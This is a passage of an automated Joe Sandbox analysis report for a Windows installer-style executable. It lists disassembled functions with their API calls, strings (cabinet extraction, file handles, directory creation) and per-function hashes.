wininet.dll, xrefs: 007E149A
Failed to create operation complete event., xrefs: 007E1538
Failed to copy file name., xrefs: 007E14A6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: e5863a144b0255a879d021925073f85d46740f2063990d98eea2a9875fb57f82
Instruction ID: 6c4a16e877b23ecf087141307fcbe66686f4ab4916fb569791d0cc2d1231c5ea
Opcode Fuzzy Hash: e5863a144b0255a879d021925073f85d46740f2063990d98eea2a9875fb57f82
Instruction Fuzzy Hash: 592139B2A42775BAF321267A8C46FB725DCFF487A0F014226BC15E76C0E66CCD0085E1

Function 007FFBAD Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 007FFBD5
GetProcAddress.KERNEL32(SystemFunction041), ref: 007FFBE7
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 007FFC2A
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007FFC3E
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 007FFC76
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007FFC8A

Strings

CryptUnprotectMemory, xrefs: 007FFC6B
SystemFunction041, xrefs: 007FFBD7
cryputil.cpp, xrefs: 007FFC5F
SystemFunction040, xrefs: 007FFBCA
AdvApi32.dll, xrefs: 007FFBB4
CryptProtectMemory, xrefs: 007FFC1F
Crypt32.dll, xrefs: 007FFC0B

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: 5822ca8798af8026fbefa4520f89b02e5737ad6faa912ca7a8b3a730c7ea2d7e
Instruction ID: 3aa279117c97558d056b28809f082ff56db6a411c662f889adad091eba94792b
Opcode Fuzzy Hash: 5822ca8798af8026fbefa4520f89b02e5737ad6faa912ca7a8b3a730c7ea2d7e
Instruction Fuzzy Hash: 0E215371A4273ADBD7315B26AE05B227794FF11750F058235ED20EA3A0FB7C9C52DAA0

Function 007E0627 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 007E0657
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 007E066F
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 007E0674
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 007E0677
GetLastError.KERNEL32(?,?), ref: 007E0681
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 007E06F0
GetLastError.KERNEL32(?,?), ref: 007E06FD

Strings

<the>.cab, xrefs: 007E0650
Failed to open cabinet file: %hs, xrefs: 007E072E
cabextract.cpp, xrefs: 007E06A5, 007E0721
Failed to add virtual file pointer for cab container., xrefs: 007E06D6
Failed to duplicate handle to cab container., xrefs: 007E06AF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: fc5e6a57da36e7b2778b021046b5c1116a5ab4d669bc6364ab2935e713540192
Instruction ID: 882c821d5bb6140c657e519b7eb200c10c57f5f3f4dfcda6405b8ecd25764682
Opcode Fuzzy Hash: fc5e6a57da36e7b2778b021046b5c1116a5ab4d669bc6364ab2935e713540192
Instruction Fuzzy Hash: 2C310772A02625BBEB215B6ACC48F9B7AACFF08760F000125FD04E7290D7689D50CAE1

Function 007D6859 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,007C4D0B,?,?), ref: 007D6879
GetCurrentProcess.KERNEL32(?,00000000,?,?,007C4D0B,?,?), ref: 007D687F
DuplicateHandle.KERNELBASE(00000000,?,?,007C4D0B,?,?), ref: 007D6882
GetLastError.KERNEL32(?,?,007C4D0B,?,?), ref: 007D688C
CloseHandle.KERNEL32(000000FF,?,007C4D0B,?,?), ref: 007D6905

Strings

Failed to duplicate file handle for attached container., xrefs: 007D68BA
Failed to append the file handle to the command line., xrefs: 007D68ED
burn.filehandle.attached, xrefs: 007D68D2
core.cpp, xrefs: 007D68B0
%ls -%ls=%u, xrefs: 007D68D9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: 5b40ac0ace4af381f3febcff437c6b7c1e2bf30799d49f2755f6079618beff35
Instruction ID: a6148df7ed91c4f7edf68ce69cf6576d2c59dfaaf9d39eff59bee03d4927a0cc
Opcode Fuzzy Hash: 5b40ac0ace4af381f3febcff437c6b7c1e2bf30799d49f2755f6079618beff35
Instruction Fuzzy Hash: B4118171A41715FBDB10ABA99D09E9A7BACFF04B70F104226F820E73E0D7799E119690

Function 007D6915 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 007D694B
CloseHandle.KERNEL32(00000000), ref: 007D69BB

Strings

Failed to append the file handle to the obfuscated command line., xrefs: 007D69A9
Failed to append the file handle to the command line., xrefs: 007D6977
burn.filehandle.self, xrefs: 007D695C, 007D698E
%ls -%ls=%u, xrefs: 007D6963, 007D6995

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: 52e244dc60df38843f6efbeeb918d240627c4e25a46943f90246382234547db8
Instruction ID: c8d2df6496dbe506602c26e21f08c470084070a3c358b15b12e41fe06fb74091
Opcode Fuzzy Hash: 52e244dc60df38843f6efbeeb918d240627c4e25a46943f90246382234547db8
Instruction Fuzzy Hash: 6311B632641610BBCB205A6CDC45F9B7BACEB45B70F014379FD24EB3E1D778A8118691

Function 0080076C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,007C52B5,00000000,?,?,?,?,?,?,?,007D74AB,00000000), ref: 0080078A
GetLastError.KERNEL32(?,?,?,?,?,?,?,007D74AB,00000000), ref: 00800794
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,007D74AB,00000000), ref: 008007C6
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,007D74AB,00000000), ref: 0080081D

Strings

procutil.cpp, xrefs: 0080080B

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Token$CloseErrorHandleInformationLastOpenProcess
String ID: procutil.cpp
API String ID: 3370771294-1178289305
Opcode ID: c3158f3c359686c36790678f249eca111d262ca2ec4291e5707047aefb0a5351
Instruction ID: 23aad148eef6b2aae09b3adcd7427f328cab1c7db962f4683d857cf5585b52f8
Opcode Fuzzy Hash: c3158f3c359686c36790678f249eca111d262ca2ec4291e5707047aefb0a5351
Instruction Fuzzy Hash: B9218171E40628EFDB509B999C48BAEBBE8FF54711F118166ED15E7290E7708E00DAD0

Function 0080343B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0080344A
InterlockedIncrement.KERNEL32(0082B6D8), ref: 00803467
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0082B6C8,?,?,?,?,?,?), ref: 00803482
CLSIDFromProgID.OLE32(MSXML.DOMDocument,0082B6C8,?,?,?,?,?,?), ref: 0080348E

Strings

MSXML.DOMDocument, xrefs: 00803489
Msxml2.DOMDocument, xrefs: 0080347D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 8b26e801582c62aad648b54fe2398f0966f93875c01137a8f37b61bbd0b5e659
Instruction ID: 3fc90ae0a317f3f14c62a365c9d775251226a86e8fed06a86fcb136a55c726b8
Opcode Fuzzy Hash: 8b26e801582c62aad648b54fe2398f0966f93875c01137a8f37b61bbd0b5e659
Instruction Fuzzy Hash: 77F0E53074663657CBA24BA6BC0DF172FA8FBB0F64F110016ED00E92E4D364998287B5

Function 00804932 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0080495A
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00804989
GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 008049B3
GetLastError.KERNEL32(00000000,0080B790,?,?,?,00000000,00000000,00000000), ref: 008049F4
GlobalFree.KERNEL32(00000000), ref: 00804A28

Strings

fileutil.cpp, xrefs: 00804978, 008049D1

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 6237dbc188d057a10ca8824a7b392c2d0937197e3f023c3c6d21df9b05435244
Instruction ID: 988a3624b5ef001f72fdde4ed9bf1dd3388365d0683bde7fa931c9f13318399c
Opcode Fuzzy Hash: 6237dbc188d057a10ca8824a7b392c2d0937197e3f023c3c6d21df9b05435244
Instruction Fuzzy Hash: 45210975A80329ABD7519BA98C44EAFBFA8FF84364F104126FE05E7291E7308C00D6E0

Function 007E07E4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 007E088A
GetLastError.KERNEL32(?,?,?), ref: 007E0894

Strings

cabextract.cpp, xrefs: 007E08B8
Failed to move file pointer 0x%x bytes., xrefs: 007E08C5
Invalid seek type., xrefs: 007E0820

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 79050137d9f7da3669ef5272d0a8124c5f727cda9aecc76da710ed22f7b20883
Instruction ID: 4a21c1df1123ffccdef228132e96db19424af9405e788815bc8a4c1041ded8e9
Opcode Fuzzy Hash: 79050137d9f7da3669ef5272d0a8124c5f727cda9aecc76da710ed22f7b20883
Instruction Fuzzy Hash: 2A31A031A0161AEFCB04DFA9CC859AAB7B9FF08720B008229F915E7650E774A9518BD0

Function 007C4013 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(007C533D,007C53B5,00000000,00000000,?,007D9EE4,00000000,00000000,007C533D,00000000,007C52B5,00000000,?,=S|,007CD4AC,=S|), ref: 007C4021
GetLastError.KERNEL32(?,007D9EE4,00000000,00000000,007C533D,00000000,007C52B5,00000000,?,=S|,007CD4AC,=S|,00000000,00000000), ref: 007C402F
CreateDirectoryW.KERNEL32(007C533D,007C53B5,007C5381,?,007D9EE4,00000000,00000000,007C533D,00000000,007C52B5,00000000,?,=S|,007CD4AC,=S|,00000000), ref: 007C4097
GetLastError.KERNEL32(?,007D9EE4,00000000,00000000,007C533D,00000000,007C52B5,00000000,?,=S|,007CD4AC,=S|,00000000,00000000), ref: 007C40A1

Strings

dirutil.cpp, xrefs: 007C40CF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 09ac68e66c758917cd85f01a2ca917017ba773dcb5565843c25e37ee8770a310
Instruction ID: efb80e1704f0669597d6d9b74fbd6f65a4348b8ebd331ec42d8d64fb58ae9b5a
Opcode Fuzzy Hash: 09ac68e66c758917cd85f01a2ca917017ba773dcb5565843c25e37ee8770a310
Instruction Fuzzy Hash: B111E436680621E6EB311BA14C64F7BB794EF54BA0F1081ADFF05EB150D76C8C91A2E1

Function 007C55B6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,007C648B,007C648B,?,007C554A,?,?,00000000), ref: 007C55F2
GetLastError.KERNEL32(?,007C554A,?,?,00000000,?,00000000,007C648B,?,007C7DDC,?,?,?,?,?), ref: 007C5621

Strings

version.dll, xrefs: 007C55E4
variable.cpp, xrefs: 007C5645
Failed to compare strings., xrefs: 007C564F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: b87de9d990e3a3206e4756a08bf27fc3bbd613e361cd2f62dda4c3e716ac995f
Instruction ID: 5470dce655968bdb7d0a0213fbf95e0d1c75d790253dd5b779f9b8e4d8a5cfc6
Opcode Fuzzy Hash: b87de9d990e3a3206e4756a08bf27fc3bbd613e361cd2f62dda4c3e716ac995f
Instruction Fuzzy Hash: 4E21D432644614ABC7148FA8CC44F6AB7A4FF49B60F61031DE815FB2D0DA36AE518690

Function 007E074E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007E114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,007E077D,?,?,?), ref: 007E1177
Part of subcall function 007E114F: GetLastError.KERNEL32(?,007E077D,?,?,?), ref: 007E1181

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 007E078B
GetLastError.KERNEL32 ref: 007E0795

Strings

cabextract.cpp, xrefs: 007E07B9
Failed to read during cabinet extraction., xrefs: 007E07C3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 2eb6ed1b04728842cf2b71511c79722af76e854254988a75e851065a628f2317
Instruction ID: 0cf1eac4ea866d08d77897c41878ca72b1549e6a0c3c1bf07a3c771524bc7f1a
Opcode Fuzzy Hash: 2eb6ed1b04728842cf2b71511c79722af76e854254988a75e851065a628f2317
Instruction Fuzzy Hash: FE010032A01268FFDB209FA9DC05E9A3BADFF09760F014129FD08E3690D7349A118BD0

Function 007E114F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,007E077D,?,?,?), ref: 007E1177
GetLastError.KERNEL32(?,007E077D,?,?,?), ref: 007E1181

Strings

cabextract.cpp, xrefs: 007E11A5
Failed to move to virtual file pointer., xrefs: 007E11AF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 0099109b2077ba1b04b4f9fe78333558f8edd4a5402b196bd11fd47c446d58ba
Instruction ID: e894825321f172c1c11837c361f8bdb2c27a48703c434204c650c6a51c220dfd
Opcode Fuzzy Hash: 0099109b2077ba1b04b4f9fe78333558f8edd4a5402b196bd11fd47c446d58ba
Instruction Fuzzy Hash: 1F01F232601729BBD7211A6A9C09E87BFA9FF057B0B008129FD1896550D7398C20C6D0

Function 00803DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00803E5E
GetLastError.KERNEL32 ref: 00803EC1

Strings

fileutil.cpp, xrefs: 00803EE5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: d6aa338f49e0128aa6fb27dab03bd06781c45d31b4c0972935f2af2ac9d1d6b0
Instruction ID: 99695bf51cc6c02829da8afbd77408ccf07c2f5f359c53bd61cb0e61ac3a70dc
Opcode Fuzzy Hash: d6aa338f49e0128aa6fb27dab03bd06781c45d31b4c0972935f2af2ac9d1d6b0
Instruction Fuzzy Hash: 5D415371E00269DBDB61CF59CC407EAB7B8FF48751F0042A6E949E7680D7B49EC48B90

Function 00804CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00803E85,?,?,?), ref: 00804D12
GetLastError.KERNEL32(?,?,00803E85,?,?,?), ref: 00804D1C

Strings

fileutil.cpp, xrefs: 00804D44

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: 96626df93f47fb7af53f32ca187cc684b76ba0d38af72c1fa5ea5b2cd9de011e
Instruction ID: f7c15982c686de7668bd9d409f156706f927b10a66f302f42f5571ab7fce505f
Opcode Fuzzy Hash: 96626df93f47fb7af53f32ca187cc684b76ba0d38af72c1fa5ea5b2cd9de011e
Instruction Fuzzy Hash: 1EF08CB2A41229BBD7509E9ADC49E9BBBADFB44761F004216FE04D7140E630AE1086E0

Function 008047D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,007D8564,00000000,00000000,00000000,00000000,00000000), ref: 008047EB
GetLastError.KERNEL32(?,?,?,007D8564,00000000,00000000,00000000,00000000,00000000), ref: 008047F5

Strings

fileutil.cpp, xrefs: 00804819

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: 13570f9b130c800a1af7de3a16e576e1f6fdeac0f24fa0d8d995c73f84912e26
Instruction ID: 669470ae2721402f555fcd3613d233d40ad67c3427d03afb8ffd6daf1406f09e
Opcode Fuzzy Hash: 13570f9b130c800a1af7de3a16e576e1f6fdeac0f24fa0d8d995c73f84912e26
Instruction Fuzzy Hash: 6BF031B1A40269AFDB509F95DC09EAB7BA8FF08751B018129BD05D7250E631DD10D7E0

Function 007C37EA Relevance: 4.6, APIs: 3, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C3829
GetLastError.KERNEL32 ref: 007C3833
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 007C389B

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: eb4c1b82c94267e4ef02ebb322377f9d7b1c283dbabf7d98f82ed7c2d95a9156
Instruction ID: 3920216afee06337938330b27e0c97969b19c8cb99891c7377d1d4461b55289e
